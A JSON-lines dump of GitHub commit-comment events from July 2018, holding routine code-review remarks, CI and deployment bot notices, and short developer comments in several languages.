{"id":"7941177690","type":"CommitCommentEvent","actor":{"login":"ShayneWong"},"repo":{"name":"ShayneWong/Tab-with-Fragment"},"payload":{"comment":{"id":29650397,"position":null,"line":null,"path":null,"commit_id":"75c84544dcdad136b380b10f82e37acf546b2ff9","created_at":"2018-07-10T02:56:56Z","updated_at":"2018-07-10T02:56:56Z","author_association":"OWNER","body":"代码优化，功能完善"}},"created_at":"2018-07-10T02:56:56Z"}
{"id":"7941178694","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29650400,"position":null,"line":null,"path":null,"commit_id":"e1e143b268adcad1c389fff13033a2b4338c3b32","created_at":"2018-07-10T02:57:19Z","updated_at":"2018-07-10T02:57:19Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-26](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-26).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-26-tre.pantheonsite.io/)"}},"created_at":"2018-07-10T02:57:19Z"}
{"id":"7941178988","type":"CommitCommentEvent","actor":{"login":"suntong"},"repo":{"name":"Chatie/wechaty-getting-started"},"payload":{"comment":{"id":29650401,"position":null,"line":null,"path":null,"commit_id":"e7b14032bca8b78e7b564543491859906770a7d0","created_at":"2018-07-10T02:57:25Z","updated_at":"2018-07-10T02:57:25Z","author_association":"NONE","body":"THANKS A LOT! \r\n\r\nReally appreciate the move!!!\r\n\r\n:+1: :100: "}},"created_at":"2018-07-10T02:57:25Z"}
{"id":"7941180554","type":"CommitCommentEvent","actor":{"login":"jrdonnell"},"repo":{"name":"jrdonnell/G-Python"},"payload":{"comment":{"id":29650405,"position":null,"line":null,"path":null,"commit_id":"91cf1a55af481951b1ab22ec4dddaaddc67fa45e","created_at":"2018-07-10T02:58:02Z","updated_at":"2018-07-10T02:58:02Z","author_association":"OWNER","body":"Fun little grader I am writing. Please help in any way you see."}},"created_at":"2018-07-10T02:58:02Z"}
{"id":"7941182662","type":"CommitCommentEvent","actor":{"login":"GraionDilach"},"repo":{"name":"ABrandau/Shattered-Paradise"},"payload":{"comment":{"id":29650407,"position":4,"line":353,"path":"rules/vehicles.yaml","commit_id":"a3f0b5c2700d32c276159bc85f9d0f4bbfdfcdac","created_at":"2018-07-10T02:58:47Z","updated_at":"2018-07-10T02:58:47Z","author_association":"COLLABORATOR","body":"Wrong indent in this section."}},"created_at":"2018-07-10T02:58:47Z"}
{"id":"7941182678","type":"CommitCommentEvent","actor":{"login":"suntong"},"repo":{"name":"Chatie/wechaty-getting-started"},"payload":{"comment":{"id":29650408,"position":1,"line":1,"path":"tests/smoke-testing.js","commit_id":"e7b14032bca8b78e7b564543491859906770a7d0","created_at":"2018-07-10T02:58:48Z","updated_at":"2018-07-10T02:58:48Z","author_association":"NONE","body":"this \"shebang\" need to be changed as well. \r\n\r\n`!/usr/bin/env node`\r\n"}},"created_at":"2018-07-10T02:58:48Z"}
{"id":"7941182808","type":"CommitCommentEvent","actor":{"login":"Luck-to-you"},"repo":{"name":"Luck-to-you/testgit"},"payload":{"comment":{"id":29650409,"position":null,"line":null,"path":null,"commit_id":"a5f01ffae9e51d1b4ca283dfea8560210d7dcfa2","created_at":"2018-07-10T02:58:51Z","updated_at":"2018-07-10T02:58:51Z","author_association":"OWNER","body":"一人饮酒醉\r\n"}},"created_at":"2018-07-10T02:58:51Z"}
{"id":"7941183708","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"PresentKim/ChunkLoader-PMMP"},"payload":{"comment":{"id":29650411,"position":null,"line":null,"path":null,"commit_id":"f46cae49165fa3f89f8ddab9e57e0d640b7504cd","created_at":"2018-07-10T02:59:12Z","updated_at":"2018-07-10T02:59:12Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user PresentKim,\nwho has created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/PresentKim/ChunkLoader-PMMP/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `378ec708-83ed-11e8-9a00-f7af3aa4d0cf`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T02:59:12Z"}
{"id":"7946046536","type":"CommitCommentEvent","actor":{"login":"johnsonw"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662185,"position":null,"line":null,"path":null,"commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T20:00:28Z","updated_at":"2018-07-10T20:00:28Z","author_association":"NONE","body":"I think this looks good but we should probably use Fable instead of raw javascript. "}},"created_at":"2018-07-10T20:00:28Z"}
{"id":"7946047581","type":"CommitCommentEvent","actor":{"login":"dschlaep"},"repo":{"name":"DrylandEcology/SOILWAT2"},"payload":{"comment":{"id":29662186,"position":null,"line":null,"path":null,"commit_id":"82811fb73ec6bc766b1fb3bb6741cd94d14dd4da","created_at":"2018-07-10T20:00:40Z","updated_at":"2018-07-10T20:00:40Z","author_association":"MEMBER","body":"@nip5 Thanks for cleaning this up. Please don't forget to delete the branch once you no longer need it (https://github.com/DrylandEcology/SOILWAT2/branches)"}},"created_at":"2018-07-10T20:00:40Z"}
{"id":"7946049290","type":"CommitCommentEvent","actor":{"login":"DU-jdto"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29662189,"position":null,"line":null,"path":null,"commit_id":"3f56419fce822e8627976d03b07a9eb901f85289","created_at":"2018-07-10T20:01:00Z","updated_at":"2018-07-10T20:01:00Z","author_association":"NONE","body":"King positions should not be used in calculating the pawn structure entry (except in the stuff stemming from do_king_safety)."}},"created_at":"2018-07-10T20:01:00Z"}
{"id":"7946049739","type":"CommitCommentEvent","actor":{"login":"Ramabhadram"},"repo":{"name":"Ramabhadram/DEVOP"},"payload":{"comment":{"id":29662191,"position":null,"line":null,"path":null,"commit_id":"35c0f732ea95ae2a924dce73a1d48fbf5510501f","created_at":"2018-07-10T20:01:07Z","updated_at":"2018-07-10T20:01:07Z","author_association":"OWNER","body":"mm"}},"created_at":"2018-07-10T20:01:07Z"}
{"id":"7946054467","type":"CommitCommentEvent","actor":{"login":"wabernatScality"},"repo":{"name":"scality/backbeat"},"payload":{"comment":{"id":29662197,"position":null,"line":null,"path":null,"commit_id":"aff404ec3c85df6fac6cf291aca94fa77c546f35","created_at":"2018-07-10T20:02:03Z","updated_at":"2018-07-10T20:02:03Z","author_association":"NONE","body":"Sorry: forgot to enter a proper commit message. I entered the requested changes to the routes, and tightened up the copy. \r\n\r\n"}},"created_at":"2018-07-10T20:02:03Z"}
{"id":"7946057610","type":"CommitCommentEvent","actor":{"login":"heiba"},"repo":{"name":"SocketCluster/baasil-cli"},"payload":{"comment":{"id":29662203,"position":null,"line":null,"path":null,"commit_id":"0540989eeef46f618e2013eaa40fa9430e1b540f","created_at":"2018-07-10T20:02:43Z","updated_at":"2018-07-10T20:02:43Z","author_association":"NONE","body":"Hello @jondubois The latest image on dockerhub is 14.0.0 https://hub.docker.com/r/socketcluster/socketcluster/tags/ this causes baasil not to work since it is trying to download image 14.0.1 which is non-existent"}},"created_at":"2018-07-10T20:02:43Z"}
{"id":"7946060659","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29662208,"position":null,"line":null,"path":null,"commit_id":"286587a3b56247392258ac0371846221ac3e85ae","created_at":"2018-07-10T20:03:21Z","updated_at":"2018-07-10T20:03:21Z","author_association":"NONE","body":"develop (mbadams5) - Win64-Windows-7-VisualStudio-14: OK (2308 of 2308 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-286587a3b56247392258ac0371846221ac3e85ae-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-286587a3b56247392258ac0371846221ac3e85ae-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T20:03:21Z"}
{"id":"7946064020","type":"CommitCommentEvent","actor":{"login":"jondubois"},"repo":{"name":"SocketCluster/baasil-cli"},"payload":{"comment":{"id":29662215,"position":null,"line":null,"path":null,"commit_id":"0540989eeef46f618e2013eaa40fa9430e1b540f","created_at":"2018-07-10T20:04:02Z","updated_at":"2018-07-10T20:04:02Z","author_association":"MEMBER","body":"@heiba Ah yes thanks I saw your message on Gitter. I'll push it up today."}},"created_at":"2018-07-10T20:04:02Z"}
{"id":"7946072477","type":"CommitCommentEvent","actor":{"login":"jnm2"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29662232,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T20:05:48Z","updated_at":"2018-07-10T20:05:48Z","author_association":"CONTRIBUTOR","body":"I think the \"This is a new feature — might be unstable/too strict\" message is referring to the 'Run' selection in the dropdown. If I select 'Syntax Tree' or 'Verify' or 'Decompile,' the message goes away."}},"created_at":"2018-07-10T20:05:48Z"}
{"id":"7946073380","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29662236,"position":17,"line":17,"path":"StockMarket/Services/StockMarketService.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T20:06:00Z","updated_at":"2018-07-10T20:06:00Z","author_association":"NONE","body":"When you are implementing a constructor please keep parameters one by one. It is easier then to compare two files when you are making a code review or just check what changes have been made on a given file. E.g. \r\n```\r\npublic StockMarketService(IStockMarketRepository stockMarketRepository,\r\n IMonthMapperService monthMapperService, \r\nIPriceAnalyzerService priceAnalyzerService)\r\n```"}},"created_at":"2018-07-10T20:06:00Z"}
{"id":"7946090687","type":"CommitCommentEvent","actor":{"login":"smilesbarel"},"repo":{"name":"smilesbarel/sample-cloud-native-toolchain-tutorial-20180709212921801"},"payload":{"comment":{"id":29662252,"position":null,"line":null,"path":null,"commit_id":"3aff48a15fda779d235fa47e3ca8f8dfd8bdee9f","created_at":"2018-07-10T20:09:38Z","updated_at":"2018-07-10T20:09:38Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/d55896e7-6059-447c-8cff-2ff80fc01048?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180709212921801\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/bd69d922-d1df-4f1e-8913-cd347139847e?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180709212921801\") deployed [sample-cloud-native-toolchain-tutorial-20180709212921801](https://github.com/smilesbarel/sample-cloud-native-toolchain-tutorial-20180709212921801/releases/tag/deploy-ibm-yp-us-south-barel-us.ibm.com-test-20180710-200938 \"deploy-ibm-yp-us-south-barel-us.ibm.com-test-20180710-200938\") to [test](https://console.bluemix.net/apps/53573252-ef1e-4abe-ad05-d64fcbd2d487?env_id=ibm:yp:us-south \"ibm:yp:us-south:barel@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-10T20:09:38Z"}
{"id":"7946094339","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29662271,"position":15,"line":15,"path":"StockMarket/Services/PriceAnalyzerService.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T20:10:23Z","updated_at":"2018-07-10T20:10:23Z","author_association":"NONE","body":"Wrong naming convention. Tmp tells me nothing. I can only guess that it means 'temporary' in fact, it should tell someone who reads your code what value you store in it."}},"created_at":"2018-07-10T20:10:23Z"}
{"id":"7946094883","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29662274,"position":16,"line":16,"path":"StockMarket/Services/PriceAnalyzerService.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T20:10:30Z","updated_at":"2018-07-10T20:10:30Z","author_association":"NONE","body":"the same here"}},"created_at":"2018-07-10T20:10:30Z"}
{"id":"7946095540","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29662276,"position":23,"line":23,"path":"week_two/les4/HW/HWex2/Dog.java","commit_id":"d1ccf765642f4e6447f9a2d806bcd2ef903d59eb","created_at":"2018-07-10T20:10:38Z","updated_at":"2018-07-10T20:10:38Z","author_association":"OWNER","body":"тут вже на if можна не перевіряти"}},"created_at":"2018-07-10T20:10:38Z"}
{"id":"7946098001","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29662286,"position":28,"line":28,"path":"week_two/les4/HW/HWex2/Dogs.java","commit_id":"d1ccf765642f4e6447f9a2d806bcd2ef903d59eb","created_at":"2018-07-10T20:11:09Z","updated_at":"2018-07-10T20:11:09Z","author_association":"OWNER","body":"ця команда нам тут наразі не потрібна"}},"created_at":"2018-07-10T20:11:09Z"}
{"id":"7946106977","type":"CommitCommentEvent","actor":{"login":"p14n"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29662300,"position":66,"line":116,"path":"contracts/RockPaperScissors.sol","commit_id":"3259dd6413010b4b9e38b64f99ed582ae4000516","created_at":"2018-07-10T20:12:59Z","updated_at":"2018-07-10T20:12:59Z","author_association":"OWNER","body":"Great tips, thanks, both."}},"created_at":"2018-07-10T20:12:59Z"}
{"id":"7946108645","type":"CommitCommentEvent","actor":{"login":"rivex00055"},"repo":{"name":"rivex00055/test"},"payload":{"comment":{"id":29662307,"position":null,"line":null,"path":null,"commit_id":"89ba38ed5c46dbc6a5deeabee194df8d44ae01e6","created_at":"2018-07-10T20:13:19Z","updated_at":"2018-07-10T20:13:19Z","author_association":"OWNER","body":"ale super zmiany 🗡 "}},"created_at":"2018-07-10T20:13:19Z"}
{"id":"7946108725","type":"CommitCommentEvent","actor":{"login":"p14n"},"repo":{"name":"p14n/eth-rockpaperscissors"},"payload":{"comment":{"id":29662308,"position":77,"line":141,"path":"contracts/RockPaperScissors.sol","commit_id":"3259dd6413010b4b9e38b64f99ed582ae4000516","created_at":"2018-07-10T20:13:20Z","updated_at":"2018-07-10T20:13:20Z","author_association":"OWNER","body":"Makes sense, thanks."}},"created_at":"2018-07-10T20:13:20Z"}
{"id":"7946109416","type":"CommitCommentEvent","actor":{"login":"smilesbarel"},"repo":{"name":"smilesbarel/sample-cloud-native-toolchain-tutorial-20180709212921801"},"payload":{"comment":{"id":29662310,"position":null,"line":null,"path":null,"commit_id":"3aff48a15fda779d235fa47e3ca8f8dfd8bdee9f","created_at":"2018-07-10T20:13:29Z","updated_at":"2018-07-10T20:13:29Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/d55896e7-6059-447c-8cff-2ff80fc01048?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180709212921801\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/bd69d922-d1df-4f1e-8913-cd347139847e?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180709212921801\") deployed [sample-cloud-native-toolchain-tutorial-20180709212921801](https://github.com/smilesbarel/sample-cloud-native-toolchain-tutorial-20180709212921801/releases/tag/deploy-ibm-yp-us-south-barel-us.ibm.com-prod-20180710-201328 \"deploy-ibm-yp-us-south-barel-us.ibm.com-prod-20180710-201328\") to [prod](https://console.bluemix.net/apps/221457e7-489c-47e3-9a1a-db9ba0732b9b?env_id=ibm:yp:us-south \"ibm:yp:us-south:barel@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-10T20:13:29Z"}
{"id":"7946120702","type":"CommitCommentEvent","actor":{"login":"EugeneKalashnikov"},"repo":{"name":"EugeneKalashnikov/csharp_training"},"payload":{"comment":{"id":29662326,"position":24,"line":47,"path":"addressbook-web-tests/addressbook-web-tests/appmanager/ContactHelper.cs","commit_id":"cb5127f8f0328dc3c8bbd9245c239156ae2a9ef0","created_at":"2018-07-10T20:15:45Z","updated_at":"2018-07-10T20:15:45Z","author_association":"OWNER","body":"Fix Bug"}},"created_at":"2018-07-10T20:15:45Z"}
{"id":"7946122048","type":"CommitCommentEvent","actor":{"login":"broeschi"},"repo":{"name":"broeschi/Programmierarbeit"},"payload":{"comment":{"id":29662330,"position":null,"line":null,"path":null,"commit_id":"2346486070b08a5b0f58d69cb0a7eda64612fe21","created_at":"2018-07-10T20:16:02Z","updated_at":"2018-07-10T20:16:02Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-10T20:16:02Z"}
{"id":"7946122111","type":"CommitCommentEvent","actor":{"login":"EugeneKalashnikov"},"repo":{"name":"EugeneKalashnikov/csharp_training"},"payload":{"comment":{"id":29662331,"position":29,"line":49,"path":"addressbook-web-tests/addressbook-web-tests/appmanager/ContactHelper.cs","commit_id":"cb5127f8f0328dc3c8bbd9245c239156ae2a9ef0","created_at":"2018-07-10T20:16:03Z","updated_at":"2018-07-10T20:16:03Z","author_association":"OWNER","body":"Fix Bug"}},"created_at":"2018-07-10T20:16:03Z"}
{"id":"7946123368","type":"CommitCommentEvent","actor":{"login":"noc0"},"repo":{"name":"fumibako/script"},"payload":{"comment":{"id":29662332,"position":null,"line":null,"path":null,"commit_id":"7bd0c0614129d278e33619959ad4a81f92fdb797","created_at":"2018-07-10T20:16:17Z","updated_at":"2018-07-10T20:16:17Z","author_association":"CONTRIBUTOR","body":"【進捗について】\r\nおはようございます。\r\n主人公服装差分の作業途中経過をご報告します。\r\nttp://www.evernote.com/l/AaBIQEnUSHJPlpC_YU54dFSkk6v_9DmsOQg/\r\n↑こちらに作業画面スクリーンショット（四条エピローグ差分作業）を参考に載せています。\r\n（ネタバレ防止のため、◆B4nFWraU42さんご確認後又は完成版作成後に消去予定です）\r\n普段着っぽく控え目に、と、乙女ゲームとしての華やかさとのバランスで悩みつつ…\r\n髪飾りが普段使い用としては華やかすぎる気もしますので、もうすこし控えめに調整予定です。\r\n大人のイメージにより近づくようにも意識して調整をしたいと思います。\r\n調整のご希望がありましたらお知らせください。このまま進めてよろしければ、お返事はお気遣いなく。\r\n\r\n次に緑色バージョンの調整予定です(全体の柄はピンクと同じで色を調整予定)"}},"created_at":"2018-07-10T20:16:17Z"}
{"id":"7946123703","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29662334,"position":8,"line":8,"path":"StockMarket.UnitTests/StockMarketRepositoryTests.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T20:16:21Z","updated_at":"2018-07-10T20:16:21Z","author_association":"NONE","body":"It looks for me like a bunch of integration tests which test the interaction with the real database. Because you don't even have a connection to the real database there is no sense to have such tests. You can test repositories if they contain some business logic; if statements, handling exceptions etc. In such a case, you should use fake(mocked) data for the sake of tests."}},"created_at":"2018-07-10T20:16:21Z"}
{"id":"7946123946","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29662335,"position":null,"line":null,"path":null,"commit_id":"438098f7755b11e616d268482f9e73ad1b5b1793","created_at":"2018-07-10T20:16:24Z","updated_at":"2018-07-10T20:16:24Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-clean](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-clean).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-clean-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-10T20:16:24Z"}
{"id":"7946124060","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29662336,"position":null,"line":null,"path":null,"commit_id":"9b5ff22063b9eb8bab8a2f304d47903b531054c7","created_at":"2018-07-10T20:16:26Z","updated_at":"2018-07-10T20:16:26Z","author_association":"MEMBER","body":"Do we really want to de-prioritize lazy tasks that much in the release notes? I think if we are going through the effort of having a blog post, we should have something in the preamble, agreed?"}},"created_at":"2018-07-10T20:16:26Z"}
{"id":"7946126403","type":"CommitCommentEvent","actor":{"login":"exking"},"repo":{"name":"jimboca/udi-wirelesstag-poly"},"payload":{"comment":{"id":29662340,"position":null,"line":null,"path":null,"commit_id":"df144cf4fd2ec4fbef018ceb73b426fba4845057","created_at":"2018-07-10T20:16:53Z","updated_at":"2018-07-10T20:16:53Z","author_association":"CONTRIBUTOR","body":"wtServer.py should really use https://www.mytaglist.com ...."}},"created_at":"2018-07-10T20:16:53Z"}
{"id":"7946127349","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29662341,"position":48,"line":1118,"path":"CaseStudies/glass/docs/SRS/glassbr_srs.tex","commit_id":"1514d32e3d926af7e7bde94fcb81cf4a61323db3","created_at":"2018-07-10T20:17:04Z","updated_at":"2018-07-10T20:17:04Z","author_association":"COLLABORATOR","body":"I'm going to make a project with all the changes as separate issues because some of them are trivial, and because I think it is a more effective way of keeping information together (ie. in the same category) while keeping it apart as well (ie. uncluttered). Unless you think this should be tackled in one issue @smiths. After making a project for SubPackages, I just think they're great. The only downside is that it would create a lot of (probably small) issues, but I don't know if that's a just cause for concern or not."}},"created_at":"2018-07-10T20:17:04Z"}
{"id":"7946131019","type":"CommitCommentEvent","actor":{"login":"yufangqq"},"repo":{"name":"lucieleblanc/CodeU-Summer-2018"},"payload":{"comment":{"id":29662349,"position":null,"line":null,"path":null,"commit_id":"03c05f4660c859fc184cb6750b7e4a5088282c3e","created_at":"2018-07-10T20:17:47Z","updated_at":"2018-07-10T20:17:47Z","author_association":"COLLABORATOR","body":"It should be named 'fakeConvoList'. It forgot to change it. It is a List type because that is the type getConversationWithOwner() method returns."}},"created_at":"2018-07-10T20:17:47Z"}
{"id":"7946132487","type":"CommitCommentEvent","actor":{"login":"mtremsal"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29662355,"position":35,"line":35,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T20:18:04Z","updated_at":"2018-07-10T20:18:04Z","author_association":"NONE","body":"As far as I can tell, we cannot; it can be provided upon request but there is no public link to it."}},"created_at":"2018-07-10T20:18:04Z"}
{"id":"7946137672","type":"CommitCommentEvent","actor":{"login":"aleksandrrusev"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29662363,"position":24,"line":13,"path":"Lesson 3/Station.rb","commit_id":"df7bf04e61a88f692993158f49fb328a67524fd2","created_at":"2018-07-10T20:19:07Z","updated_at":"2018-07-10T20:19:07Z","author_association":"OWNER","body":"А чем `arrival` / `departure` был плохо? `arrival(train)` понятно что arrival это прибытие(поезда) это же и читается?\r\nНапример задание или запрос - `accept` / `decline` но раз мы рассматриваем поезда разве не удобнее как я назвал в первый раз???"}},"created_at":"2018-07-10T20:19:07Z"}
{"id":"7946138740","type":"CommitCommentEvent","actor":{"login":"marcosraudkett"},"repo":{"name":"marcosraudkett/easyajax"},"payload":{"comment":{"id":29662366,"position":120,"line":139,"path":"src/json.class.php","commit_id":"71c6b450be19f124518f7a792304ffced72f71d0","created_at":"2018-07-10T20:19:20Z","updated_at":"2018-07-10T20:19:20Z","author_association":"OWNER","body":"Work in progress."}},"created_at":"2018-07-10T20:19:20Z"}
{"id":"7946139066","type":"CommitCommentEvent","actor":{"login":"sshafer101"},"repo":{"name":"sshafer101/crispy-palm-tree"},"payload":{"comment":{"id":29662369,"position":1,"line":1,"path":"README.md","commit_id":"3c863f06eacdc6b211f573f90a679be84eda3c0a","created_at":"2018-07-10T20:19:24Z","updated_at":"2018-07-10T20:19:24Z","author_association":"OWNER","body":"comment comment comment comment \r\n![untitled](https://user-images.githubusercontent.com/24491530/42535280-f6c62160-845c-11e8-992e-fe110f48001d.png)\r\n"}},"created_at":"2018-07-10T20:19:24Z"}
{"id":"7946147553","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29662381,"position":null,"line":null,"path":null,"commit_id":"14cbe91b4c85fadd03b659ed1ab03d2a08c1dd8a","created_at":"2018-07-10T20:21:07Z","updated_at":"2018-07-10T20:21:07Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-324](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-324).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-324-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-10T20:21:07Z"}
{"id":"7946154462","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/elekamate"},"payload":{"comment":{"id":29662394,"position":null,"line":null,"path":null,"commit_id":"ad883a5d67f7d85322c0fd2d5f95f7aacd714348","created_at":"2018-07-10T20:22:29Z","updated_at":"2018-07-10T20:22:29Z","author_association":"NONE","body":"`List.cshtml` is fine, this is actually the level you should know right know about fonrtend development"}},"created_at":"2018-07-10T20:22:29Z"}
{"id":"7946157365","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/elekamate"},"payload":{"comment":{"id":29662404,"position":null,"line":null,"path":null,"commit_id":"ad883a5d67f7d85322c0fd2d5f95f7aacd714348","created_at":"2018-07-10T20:23:03Z","updated_at":"2018-07-10T20:23:03Z","author_association":"NONE","body":"also, your commit message is a bit messy, too many files changed is this commit can not see whats happening"}},"created_at":"2018-07-10T20:23:03Z"}
{"id":"7946159091","type":"CommitCommentEvent","actor":{"login":"mrstockman"},"repo":{"name":"bizsolutionstech/BizSolutions.Tech"},"payload":{"comment":{"id":29662407,"position":null,"line":null,"path":null,"commit_id":"f39865e6a808dda5f6d4a52dddc51807103ec207","created_at":"2018-07-10T20:23:22Z","updated_at":"2018-07-10T20:23:22Z","author_association":"CONTRIBUTOR","body":"Hi,  \r\nThis is where we can share code. We can also use this repository to connect instances to so we can upload, etc to ServiceNow also.  This should be visible via VisualStudio."}},"created_at":"2018-07-10T20:23:22Z"}
{"id":"7946159455","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29662408,"position":null,"line":null,"path":null,"commit_id":"7ffe3d8d64464d79f451e088b4d2ffedbb95659b","created_at":"2018-07-10T20:23:26Z","updated_at":"2018-07-10T20:23:26Z","author_association":"COLLABORATOR","body":"<h3>[docs] fixes for version selection (#2662)</h3>\n\nPreview: <strong><a href='https://18169-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18169-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18169-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-10T20:23:26Z"}
{"id":"7946159842","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29662409,"position":null,"line":null,"path":null,"commit_id":"799d2b072f4b5ea5e3077c3d3ba68be9bd456052","created_at":"2018-07-10T20:23:31Z","updated_at":"2018-07-10T20:23:31Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-325](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-325).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-325-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-10T20:23:31Z"}
{"id":"7946162821","type":"CommitCommentEvent","actor":{"login":"chriseth"},"repo":{"name":"ethereum/solidity"},"payload":{"comment":{"id":29662419,"position":71,"line":2337,"path":"libsolidity/ast/Types.cpp","commit_id":"16acd9ee7e9820516bf55dfe33ba5b1ec39b7aed","created_at":"2018-07-10T20:24:07Z","updated_at":"2018-07-10T20:24:07Z","author_association":"CONTRIBUTOR","body":"Ah, that's a clever change!"}},"created_at":"2018-07-10T20:24:07Z"}
